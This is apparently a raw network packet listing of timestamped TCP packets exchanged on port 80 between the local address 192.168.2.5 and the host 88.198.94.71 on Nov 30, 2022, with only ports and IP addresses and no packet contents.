Nov 30, 2022 00:22:31.826276064 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.826286077 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.826303005 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.826313972 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.826329947 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.826356888 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.826380968 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.826404095 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.826423883 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.826446056 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.826462984 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.826482058 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.826488018 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.826513052 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.826535940 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.826544046 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.826544046 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.826554060 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.826570988 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.826586962 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.826607943 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.826623917 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.826632023 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.826654911 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.826657057 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.826673031 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.826682091 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.826708078 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.826708078 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.826730967 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.826744080 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.826759100 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.826781988 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.826968908 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.826992989 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.827016115 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.827037096 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.827043056 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.827063084 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.827069998 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.827095032 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.827101946 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.827117920 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.827125072 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.827147007 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.827172995 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.827179909 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.827179909 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.827191114 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.827198029 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.827212095 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.827222109 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.827239990 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.827246904 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.827260017 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.827270985 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.827291965 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.827296019 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.827317953 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.827317953 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.827332973 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.827342033 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.827359915 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.827366114 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.827382088 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.827392101 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.827418089 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.827418089 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.827430964 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.827441931 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.827457905 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.827480078 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.827933073 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.827953100 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.827971935 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.827992916 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828008890 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828017950 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828046083 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828046083 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828068972 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828077078 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828095913 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828107119 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828120947 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828134060 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828145027 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828159094 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828169107 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828191996 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828192949 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828216076 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828218937 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828242064 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828242064 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828259945 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828268051 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828293085 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828294992 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828309059 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828318119 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828332901 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828341961 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828356028 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828366995 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828382969 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828392029 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828407049 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828417063 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828428984 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828440905 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828463078 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828464031 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828479052 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828490019 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828504086 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828514099 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828526974 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828537941 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828552961 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828572035 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828587055 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828596115 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828610897 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828620911 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828635931 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828645945 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828660965 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828671932 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828689098 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828696966 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828713894 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828723907 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828737020 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828752041 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828775883 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828790903 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828800917 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828809023 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828830004 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828833103 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828845024 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828859091 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828879118 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828907013 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828907967 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828938961 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828943014 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828969955 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.828979015 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.828995943 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.829001904 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.829015970 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.829031944 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.829046965 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.829060078 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.829077005 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.829088926 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.829106092 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.829116106 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.829133034 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.829144001 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.829160929 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.829169035 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.829194069 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.829204082 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.829222918 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.829224110 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.829240084 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.829252005 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.829267025 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.829281092 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.829301119 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.829327106 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.829330921 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.829354048 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.829355955 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.829381943 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.829381943 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.829400063 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.829408884 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.829422951 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.829433918 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.829452991 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.829461098 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.829474926 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.829485893 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.829500914 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.829511881 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.829530954 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.829536915 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.829556942 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.829566002 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.829576015 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.829591990 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.829610109 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.829618931 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.829631090 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.829646111 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.829662085 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.829675913 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.829698086 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.829706907 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.829726934 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.829727888 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.829755068 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.829756021 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.829782963 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.829823971 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.829852104 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.865937948 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.866034031 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.866045952 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.866069078 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.866091967 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.866107941 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.866111040 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.866132021 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.866147041 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.866149902 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.866167068 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.866169930 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.866189957 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.866199017 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.866209030 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.866229057 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.866231918 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.866259098 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.866296053 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.867969036 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.868011951 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.868041039 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.868067980 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.868097067 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.868099928 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.868122101 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.868151903 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.868168116 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.868217945 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.868267059 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.868284941 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.868303061 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.868309021 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.868323088 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.868335009 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.868343115 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.868361950 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.868365049 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.868381023 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.868388891 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.868400097 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.868417025 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.868417978 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.868443966 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.868468046 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.868663073 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.868681908 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.868700981 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.868721962 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.868738890 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.868740082 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.868758917 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.868767023 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.868778944 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.868793964 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.868798971 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.868815899 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.868818998 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.868832111 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.868838072 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.868850946 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.868858099 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.868877888 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.868879080 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.868885994 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.868900061 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.868906975 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.868922949 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.868926048 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.868942022 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.868948936 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.868967056 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.868983984 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.869720936 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.869744062 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.869762897 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.869781971 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.869800091 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.869818926 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.869827986 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.869837046 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.869856119 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.869857073 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.869874001 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.869877100 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.869895935 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.869906902 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.869930983 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.869956017 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.870210886 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.870230913 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.870249033 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.870268106 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.870282888 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.870287895 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.870309114 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.870315075 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.870327950 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.870336056 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.870347977 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.870363951 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.870367050 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.870382071 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.870385885 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.870399952 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.870424986 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.870439053 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.870639086 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.870659113 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.870688915 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.870707989 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.870708942 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.870727062 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.870733976 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.870747089 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.870764971 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.870781898 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.870800972 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.870801926 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.870810032 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.870820045 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.870841026 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.870887995 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.870907068 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.870939016 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.870946884 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.870978117 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.870985031 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.871005058 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.871022940 CET	80	49710	88.198.94.71	192.168.2.5
